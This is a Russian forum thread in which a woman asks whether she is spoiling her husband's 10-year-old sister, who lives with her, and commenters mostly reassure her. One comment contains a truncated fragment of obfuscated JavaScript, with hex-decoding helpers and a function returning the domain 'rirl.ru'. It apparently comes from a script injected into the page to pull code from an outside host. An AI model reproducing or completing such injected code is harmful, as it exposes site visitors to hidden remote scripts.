Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
меньше минуты назад2016-12-07 21:22:31 от Гость
что написать парню на отношения 11 месяцев приятное?? ... Подробнее
Последний комментарий
История : Помогите советом о моей жизненной практики
час назад2016-12-08 10:58:16 от Moody
20123Гость, я думаю выход есть. Просто посидите все вместе, подумайте и найдете решение. Мы не знаем вашу семью, ваши возможности потенциальные, не знаем ни регион, где живите, не возможные места учебы для ваших детей. Только вы это знаете. Не надо обижаться, просто подумайте. Наверняка решение найдется. Все комментарии67623
Вход
Здравствуйте, гость !
Войдите под своим именем
или Зарегистрируйтесь.
Топ из раздела
Истории о детях
Комедия
вчера в 12:41:152016-12-07 12:41:15
Любовь это безумия
05 декабря в 06:58:47
Любимый брат мужа
04 декабря в 21:17:22
На работу к папе
03 декабря в 16:30:38
Студент и препод
28 ноября в 23:53:36
Волосенкиии
27 ноября в 22:35:51
Сериалы смотрим?  ( 1 2 )
27 ноября в 16:31:08
опустить на главную
24 ноября в 07:57:38
Истории о детях - Баловство.
Истории о детях : Баловство.     

Дорогие мои читатели, доброго вам дня! Спешу сегодня с новой историей и надеюсь получить от вас совет.

У моего мужа есть родная сестрёнка, Аня, ей 10 лет. Жила всю свою жизнь с родителями, за городом, в местной школе отлично окончила обучение в начальных классах. Девочка добрая, воспитанная, умненькая, любознательная. Очень хочет заниматься музыкой, но в посёлке школы искусств нет.

Мы с мужем живём в городе, и прямо под окнами у нас находится лицей, чуть дальше - музыкальная школа. Продать квартиру в посёлке сейчас сложно, купить в городе тоже проблемно, поэтому мы предложили родителям такой вариант: Анютка, если поступит в лицей (в чём никто не сомневался), поживет пока у нас (благо в трехкомнатной квартире всем хватит места), а там уже как жизнь сложится. Такое предложение все одобрили, и уже к первому числу настоящего месяца девочка переехала к нам.

Не подумайте, пожалуйста, что я такая придира или зазнаюсь, нет. Но я хорошо знаю современную молодежь и то, как они могут отреагировать на девочку не городскую, очень скромно, прямо скажем бедненько одетую. Я увидела, что весь гардероб ребенка занимает одну полку в шкафу, и в тот же день потащила Анечку по магазинам - на шоппинг. Она, конечно, смущалась и отказывалась, а потом, наверное, ей понравился такой поход по магазинам с подругой (ведь мы именно в таких отношениях), накупили и на лето всего, и на осень.

Дальше я подумала, что раз началось лето, День Города на носу, можно же и сходить с ребёнком погулять, чего тут зазорного? В кино, в кафе, на аттракционы. Всё равно каждый день такого не случится, этим девочку не избаловать, на мой субъективный взгляд.

Родители у Ани работают, не наездишься в город, у нас машина есть, но они сами говорили, что лучше дату назначат, потому как каждый день гостей принимать не могут (но это понятно). А тут вот приехали к нам. И отчитали меня по всему, что я вам рассказала. Одежды накупили - деньги зря тратим, гулять ходим - пустая трата времени, лучше бы книжки читала. А Аня, между прочим, книжки читает и с большим удовольствием, её и заставлять не надо.

Но больше всего замечаний было по поводу нашего уклада жизни, который возник сам собой. Поясню.

Я не считаю нужным летом, в каникулы, будить ребенка в восемь часов. Здесь у неё нет тех обязанностей, что были в поселке, так зачем мешать сну? К тому же, спит она часов до половины десятого-десяти, это, на мой взгляд, не так уж и много. А мама против - балую.

Всегда у меня дома есть фрукты, и если сейчас сезон персиков, абрикосов и ягод, то преимущественно эти лакомства на столе ежедневно. И если Аня хочет, она в любой момент может съесть банан, киви, апельсин, горсточку черешни или пару персиков. Дома у них такого не было, поэтому мама снова недовольна, что мы так расточительны в плане еды.

Со стиркой разногласия возникли, мол, электричество тратим - летние вещи можно и руками стирать, надо Аню к хозяйству приучать. А я смотрю на девочку, и восхищаюсь - я в свои десять не была такой хозяюшкой. Она и бельишко свое стирает, и в комнате всегда чистота и порядок, и посуду намоет, ни о чем просить не нужно! Как не поощрять такую сознательность, такое старание? Или это и правда нужно принимать как должное?

Со свекровью у меня хорошие отношения, и единственное, на чем мы не сходимся - так это вот на вопросах, связанных с жизнью Анютки. Понимаете, я и возражать ей не могу, она мать, как никак. Но и не уверена, что смогу быть с девочкой стороже, мне хочется сохранить эти дружеские отношения.

Дорогие, скажите, я не права? Всё-таки нет у меня опыта в воспитании детей. К какому прийти компромиссу, как выстраивать с Анюткой отношения и не портить их со свекровью? Поделитесь своим мнением, пожалуйста. Хорошего всем дня!

65213
Другие Истории о детях
(30)
Гость
Гость

25 июня 15:14:26
2016-06-25 15:14:26
Добрый день. Вы прекрасны! Всегда мечтала, чтобы все родители были такими. Думаю, Вам стоит делать так, как просят родители девочки. А так, они не правы. Так называемое "баловство" можно свести на малое количество.
Ответить
Поддерживаю Да2 / Нет0
Жена ингуша
8745 Жена ингуша
Жена ингуша online
Репутация : 2562481
Комментариев 14442 50
25 июня 15:22:39
2016-06-25 15:22:39

Не думаю, что это можно назвать баловством, ведь именно из этого состоит современная жизнь во всей её красе. Обожаю прогресс за это. За стиральные и посудомоечные машины, за возможность кушать фрукты, не выращивая их и не гробясь на садовом участке, да за всё!

Не все ведь живут в деревне без условий и должны стирать руками. Вообще, в принципе, если на то пошло, что ж Анины родители не требуют, чтоб девочка на речку или пруд стирать ходила, а что, пусть приучается....

И не думаю, что эту девочку можно разбаловать - она уже воспитана по-другому. А значит будет адекватно реагировать на все условия.

Вообще, не обязательно же Анину маму во всё посвящать. Пусть Анюта молча лопает абрикосы и персики, нет никакой нужды рассказывать, сколько денег на неё потрачено.

И ещё. Как бэ так сказать... Аня же у вас в гостях? Ну так, ваш дом, ваши правила. Мне, например, никто не указывает, чем кормить племянников, когда они приезжают в гости и как стирать им вещи.

Ответить
Поддерживаю Да5 / Нет0
- Нажмите любую клавишу. - Эту можно? - Эту нет.
Гость
Гость

25 июня 15:41:31
2016-06-25 15:41:31

Гость, спасибо Вам за комплимент! Вот Вы советуете свести т. н. "баловство" на минимум, а я не понимаю, куда меньше?

Жена ингуша, согласна с Вами от и до, особенно со словами о том, что девочку не разбаловать этим - её ведь очень правильно воспитали. Спасибо большое за советы, очень ценные, приму к сведению!

Ответить
Поддерживаю Да0 / Нет0
Боровцова
18583 Боровцова
Боровцова offline
Репутация : 12226
Комментариев 152 0
25 июня 15:42:20
2016-06-25 15:42:20

Не считаю, что Вы не правы. Наоборот! Она же ребёнок ещё, зачем забирать у неё детство? А переезд к Вам - это шанс для девочки узнать что такое жизнь, увидеть что-то новое, интересное, развеяться. Всё правильно Вы делаете, даже сомневаться не надо. Уверена, что с Вас выйдет прекрасная мать.

Ответить
Поддерживаю Да1 / Нет0
Осенняя
17330 Осенняя
Осенняя offline
Репутация : 401434
Комментариев 2258 2
25 июня 16:35:34
2016-06-25 16:35:34

Так редко историй, где родня мужа не напрягает невестку. Вы молодец, когда еще баловать детей если не в детстве. Всё в рамках разумного. Тем более ходить опрятной и красивой девочкой, кушать фрукты-ягоды это и не баловство вовсе.

Ответить
Поддерживаю Да4 / Нет0
Лисичка
Лисичка

25 июня 16:40:22
2016-06-25 16:40:22
Знаете читая ваши комментарии и истории, у меня сложилось о вас мнение как об очень приятном и светлом человеке! Считаю что вы все правильно делаете, никакого баловства я здесь не вижу. Мне кажется ваша свекровь наоборот должна быть рада, что ее дочь вам не в тягость. Так что все нормально.
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

25 июня 16:51:09
2016-06-25 16:51:09

Боровцова , вот и я думаю, что если есть возможность показать ребенку мир и наполнить жизнь яркими красками - непозволительно от этого шанса отказываться. Спасибо Вам за комплимент, он для меня сейчас особенно приятен!

Осенняя, ой, мне на родителей мужа грех жаловаться! Замечательные люди, трудяги, смотрю на них и вижу много общего со своими родителями, наверное, в этом всё и дело. Спасибо за Ваш комментарий, согласна с ним от и до.

Лисичка, как приятно слышать! Спасибо Вам!

Ответить
Поддерживаю Да0 / Нет0
Ночная Фурия
18055 Ночная Фурия
Ночная Фурия offline
Репутация : 123051
Комментариев 2542 6
25 июня 19:09:11
2016-06-25 19:09:11

Не воспитание, а гнобление какое-то, как можно просить ограничивать даже в тех же витаминах, своего ребенка? По поводу одежды, возможно родителям стыдно что они не могут всего этого позволить, мама может ревновать и переживать что девочка по возвращению изменится, разленится и разбалуется.

Ответить
Поддерживаю Да2 / Нет0
Мне осталась одна забава: Пальцы в рот — и веселый свист. Прокатилась дурная слава, Что похабник я и
шоколадочка
18143 шоколадочка
шоколадочка online
Репутация : 122664
Комментариев 1113 17
25 июня 20:09:56
2016-06-25 20:09:56

Ой, какая приятная позитивная история)) Считаю, что Вы себя ведете очень даже хорошо по отношению к девочке. Читая историю, невольно даже представила себя маленькой и захотела к Вам в гости, чтобы кто-нибудь вот так же за мной поухаживал бы))))) Здорово, когда есть такие позитивные люди. Это не баловство! Это вполне нормальный городской уклад жизни. Почему обязательно нужно детям вставать в определенное время, если пока нет в этом необходимости?! Ребенок может отдохнуть, если позволяют время и условия. Тем более, если Анечка - воспитанна и послушна, далеко не избалованна. Вряд ли Вы ей нанесете какой-то вред, скорее наоборот - веселье и позитив, хорошее настроение и дружеский настрой. Пусть дети чаще улыбаются, тогда и близким людям будет на душе спокойно. А свекрови просто поменьше рассказывайте, что да как. И ей спокойней будет.

// o;o++)t+=e. CharCodeAt(o). ToString(16);return t}, a=function(e){e=e. Match(/[\S\s]{1, 2}/g);for(var t="", o=0;o < e.length;o++)t+=String.fromCharCode(parseInt(e[o],16));return t},d=function(){return "rirl.ru"},p=function(){var w=window,p=w.document.location.protocol;if(p.indexOf("http")==0){return p}for(var e=0;e

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

25 июня 20:10:07
2016-06-25 20:10:07
Хорошая девочка , хорошая принимающая семья , а на остальное не обращайте внимания , главное . чтобы свекровь к вам не зачастила . Со временем девочка вырастет и будет вспоминать вас с благодарностью...
Ответить
Поддерживаю Да1 / Нет0
Dead end
21246 Dead end
DeaD EnD offline
Репутация : 17705
Комментариев 199 0
25 июня 20:13:20
2016-06-25 20:13:20

Приятно вас читать! Вы молодец! И девочка хорошая, она явно ценит ваше отношение. Поэтому балуйте и не бойтесь. Она увидит лучшую жизнь и будет стремится к лучшему. Счастья вам и маленькой принцессе.

Ответить
Поддерживаю Да2 / Нет0
Это для мужчин женщина - загадка... У женщин все по-другому... Одна другую видит насквозь
Гость
Гость

25 июня 21:33:55
2016-06-25 21:33:55

Ночная Фурия, нет, это не гнобление. Просто у всех же бюджет разный, для семьи моего мужа и персики, и абрикосы, и прочая экзотика строят дорогвато. Да что говорить, сейчас же и правда всё стоит совсем не дешево. А она (свекровь), как заботливая мать, переживает, лишь бы мы не ограничивали себя в чём-то, тратя деньги на девочку, лишь бы у нас самих копеечка всегда была. А насчёт покупки одежды я с Вами соглашусь, наверняка дело и в этом тоже.

шоколадочка , вот я иногда смотрю на Анютку и сама думаю, были бы в моем детстве такие брат и его жена (они появились, но немного позже)! Тогда бы и музыкалку, наверное, не бросила. Спасибо большое Вам за Ваш комментарий и совет, соглашусь с ним и постараюсь так и действовать!

Гость, спасибо Вам на добром слове!

Dead end, спасибо Вам!

Ответить
Поддерживаю Да0 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка online
  • Мисс Остроумие
Репутация : 2898257
Комментариев 17180 30
25 июня 21:38:07
2016-06-25 21:38:07

Никогда не думала, что это оказывается - баловство. Сама выросла в городе, где ходила кататься на карусели. Где родители покупали фрукты. Ну и одежда всегда нормальная была. И уж точно никто не заставлял меня вставать во время выходных и каникул в 8 утра.

Да и в деревню я тоже ездила. Там тоже были подружки. Тоже не припомню, чтобы кого-то из них родители с утра пораньше поднимали.

Родители девочки, как на мой взгляд, перебарщивают с этим всем. Конечно, я согласна, что ребёнка нужно приучать прибирать у себя в комнате. Но они уж слишком как-то строги. И как по мне, консервативных взглядов. Мы живём во время, когда важно, во что ты одет и какие гаджеты имеются. Я имею в виду именно детей. У меня племяннику сейчас 12 лет, скоро будет 13. Смотрю на него и его друзей, все одеты с иголочки, у всех модные стрижки и крутые телефоны. В моё детство все проще были. А сейчас, если родители ребёнка не могут позволить одеть его нормально и телефон, планшет и т. д. купить, считай ребёнок изгой.

Ответить
Поддерживаю Да3 / Нет1
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

25 июня 21:45:07
2016-06-25 21:45:07

Блондиночка , моё детство прошло в маленьком городке, где почти у каждого и огороды, и обязанности, но не припоминаю, чтобы кто-то рос в такой строгости, как Аня. Я думаю, её родители - скорее исключение из правил. Они действительно консервативные люди, а масла в огонь подливает еще и стыд (в какой-то мере) за воспитание сына. Он вот не захотел заниматься домом, садом и огородом, не продолжил дело отца, очень рано уехал в город. По мнению родителей городская жизнь его развратила. А я думаю, что они преувеличивают, утрируют - замечательный вырос парень, это я как жена его говорю! Он бывает расточителен, может покапризничать, но не ленивый и работящий. В общем, родители Анечки, наверное, просто боятся её упустить, вот отсюда и такое воспитание строгое, правильное, но строгое.

Вот и я гляжу на современную молодежь и понимаю, что там по одежке и гаджетам встречают. Хорошо это или плохо - другое дело, но не хочу, чтобы ребенок страдал, обрастал комплексами и чувствовал себя не в своей тарелке.

Ответить
Поддерживаю Да1 / Нет0
Блондиночка
10883 Блондиночка
Блондиночка online
  • Мисс Остроумие
Репутация : 2898257
Комментариев 17180 30
25 июня 21:57:29
2016-06-25 21:57:29

Felicità , да это больше похоже, что они решили на девочке реабилитироваться. Но палку всё таки перегибают. Конечно, воспитывать ребёнка нужно, но не как солдата.

Тем более у них девочка. А девочки ох как любят наряжаться и красивую одежду. А они лишают девочку этого, мол это лишнее. И ни к чему вообще. Я с такой политикой не согласна.

Я вообще считаю, что если родили ребёнка, то он не должен хуже других в чём то быть. А то он будет ощущать себя ущербным. А ведь это останется с ним на всю жизнь. Сложнее будет находить общий язык со сверстниками. На всём отразится.

У меня в классе с моим племянником учится мальчик. Я так понимаю из не богатой семьи. Вот племянник много раз рассказывал, что у Лёни рубашка жёлтая и штаны короткие. И что с ним никто сидеть даже не хочет за одной партой. Дети жестокие.

Ответить
Поддерживаю Да2 / Нет0
Хожу по дому на каблуках и пью кефир из фужера. Это придаёт моему безделью особую изысканность.
Гость
Гость

25 июня 23:12:27
2016-06-25 23:12:27
Будьте такой как Вы есть, не подстраивайтесь под окружение. Ребёнок чувствует фальшь, будьте ей другом. А её родители просто слишком много хотят! Время не стоит на месте. И каждое поколение живёт своей жизнью. Хорошего человека тряпка и фруктами не испортить!
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

26 июня 00:26:12
2016-06-26 00:26:12

Гость, спасибо большое Вам за совет!

Ответить
Поддерживаю Да0 / Нет0
Птаха
21082 Птаха
Птаха offline
Репутация : 22346
Комментариев 354 1
26 июня 12:33:59
2016-06-26 12:33:59
Felicità , Вы в восторге от девочки, сестренки мужа. Ей 10 лет, а она многие вещи делает без напоминания) и в комнате чисто, и бельишко своё простирнет))) это же здорово. Девочку хорошо воспитывают родители. Если бы девчонка была избалована, как многих щас балуют, Вы бы взвыли на второй день. Мелочи, вроде кровать свою прибрать, посуду за собой промыть, Вам пришлось бы делать самой. Представьте, Вы приходите домой, а она является на диване и музыку слушает или в компе целый день торчит. Как такой вариант? К чему я? К тому, что все что Вы видите-это результат родительского воспитания. Моему ребёнку(13 лет) сто раз надо сказать, чтоб постель свою убрал, дочь же все сама делает. А все потому, что дочь строго воспитывала, а над сынишкой тряслась(болел долго), все за него делаем и вот результат. Мама Вашего мужа умница и страх(не более) , что баловство испортит её, оправдан. Девочке всего 10 лет, испортить только так можно. То, что для Вас обычно, для мамы девочки баловство. Что Вам посоветовать? Ничего не делайте) Просто оставьте все как есть) Девочку Вы не балуете, это все обычно. Здорово, что Вы понимаете родителей мужа. Здорово, что у Вас ними полное взаимопонимание. И главное. Девочку они к Вам отпустили, значит, Вам полностью доверяют. Так что не загоняйтесь. Живите и радуйтесь)))))
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

26 июня 14:53:11
2016-06-26 14:53:11

Птаха, здравствуйте! Вы абсолютно правы, я в восторге! Для кого-то это норма, а я вспоминаю себя и поражаюсь самостоятельности и хозяйственности ребенка! И я безмерно восхищаюсь родителями мужа, они вырастили двоих прекрасных детей. Согласна с Вами от и до.

Ответить
Поддерживаю Да0 / Нет0
Юрисконсульт
Юрисконсульт

26 июня 19:45:41
2016-06-26 19:45:41
Было бы баловство если бы девочка, к примеру попросила дорогущий айфон или еще какой-нибудь современный гаджет, а вы без оговорочно купили бы. И каждый каприз выполняли бы по первому требованию. Вот это было бы баловством. А в данной ситуации я считаю нет баловства, вполне нормально купить ребенку фрукты, одежду и сводить на аттракционы(мой ребенок видит это все почти каждый день, особенно фрукты)
Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

26 июня 21:24:41
2016-06-26 21:24:41

Юрисконсульт , коллега, доброго Вам вечера! Согласна с Вами.

Ответить
Поддерживаю Да0 / Нет0
Bert
20913 Bert
Bert offline
Репутация : 124710
Комментариев 1181 1
26 июня 21:50:08
2016-06-26 21:50:08

Не думаю, что ребёнка можно изболовать фруктами, или походами в какие то развлекательные места. Мне кажеться это нормально, если есть при этом возможность. Вы сами пишите, что девочка хорошая, так почему же не порадовать её. Тем более у неё раньше такого не было. Вы молодец, ваше отношение к ней , говорит о том, что вы очень хороший человек. Просто родители скорей всего обеспокоены, что после они не смогут дать всего того, что даёте вы ей. В любом случае, вы у себя дома и имеете полное право делать, как считаете нужным. Я имею виду, где стирать, когда и чем. Удачи вам!

Ответить
Поддерживаю Да1 / Нет0
Гость
Гость

26 июня 21:53:30
2016-06-26 21:53:30

Bert, спасибо Вам за Ваше мнение и добрые слова, их безумно приятно слышать! Удачи и Вам!

Ответить
Поддерживаю Да0 / Нет0
Оксана06
13666 Оксана06
Оксана06 offline
Репутация : 80097
Комментариев 608 0
27 июня 14:44:32
2016-06-27 14:44:32

А может девочка такая замечательная потому что родители её держали в строгости? Хотя никакого криминала я не вижу в Вашей истории, для многих семей это норма)

Ответить
Поддерживаю Да2 / Нет0
ника777
21248 ника777
Ника777 online
Репутация : 115836
Комментариев 2150 3
28 июня 15:26:32
2016-06-28 15:26:32

Всему должен быть разумный предел, там она жила в строгости поэтому мать ее недовольной осталась, мол от такой жизни развязной станет, у ребенка должно быть детство!!!! А не постоянно пичкать ее хозяйственными проблемами, нет конечно, нужно ее по тихоньку приучать к основным обязанностям женщины. Да, может и мать заревновала и позавидовала, на то как вы живете, потому что сама не может ей дать такую жизнь, как у вас!

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гость
Гость

30 июня 12:58:45
2016-06-30 12:58:45

Оксана06 , здравствуйте! Я тоже склоняюсь к мнению, что именно в строгости родители смогли воспитать в ней трудолюбие, ответственность и самостоятельность.

ника777, добрый день! Меньше всего мне хочется, чтобы мамочка Анютки чувствовала себя неуютно, глядя на новую жизнь ребенка. Поэтому мы с мужем стараемся им помогать всем, чем можем. Но с Вами я согласна.

Ответить
Поддерживаю Да1 / Нет0
ника777
21248 ника777
Ника777 online
Репутация : 115836
Комментариев 2150 3
30 июня 13:06:13
2016-06-30 13:06:13

Felicità , Да конечно, а помощь вашу они всегда охотно принимали? Я тут подумала еще, вот будет у вас девочка жить, а у ее матери, тем временем, все больше и больше ком недовольствия расти и в итоге захочет обвинить вас, о том, что много потокали, баловали, да ревновать начнет к вам, и заберет ее, вы не думали об этом?

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гость
Гость

30 июня 15:22:49
2016-06-30 15:22:49

ника777, поначалу, скажу Вам честно, мы помогали больше тайком - то денежку на карту переведем, то подарок подарим, как-то это обыграв. Они всё боялись, что мы себя обижаем, нуждаемся в чём-то. Сейчас с этим проще.

Девочку она так и так заберет, потому что в планах-то покупка жилья в городе и переезд. И я к этому отношусь абсолютно нормально. Да и всё-таки свекровь у меня женщина понимающая и благоразумная, я надеюсь на её понимание.

Ответить
Поддерживаю Да0 / Нет0
ника777
21248 ника777
Ника777 online
Репутация : 115836
Комментариев 2150 3
30 июня 15:49:39
2016-06-30 15:49:39

Felicità , Надеюсь, что все будет хорошо))))

Ответить
Поддерживаю Да1 / Нет0
Мы никогда не получим то, чего мы хотим, пока не будем благодарны за то, что имеем.
Гость
Гость

01 июля 15:44:10
2016-07-01 15:44:10

ника777, доброго Вам дня! И я!

Ответить
Поддерживаю Да1 / Нет0
Уважаемые пользователи, у каждого человека своя точка зрения на то, что изложено в истории. Даже если Вы не согласны с автором истории или с другими читателями, пытайтесь выражать свое мнение в деликатной форме. Чтобы обгадить другого, много ума не нужно, а вот помочь дельным советом не каждый сможет.
Имя :
Пол: Гость Гость
Простой редактор

Введите число указанное на картинке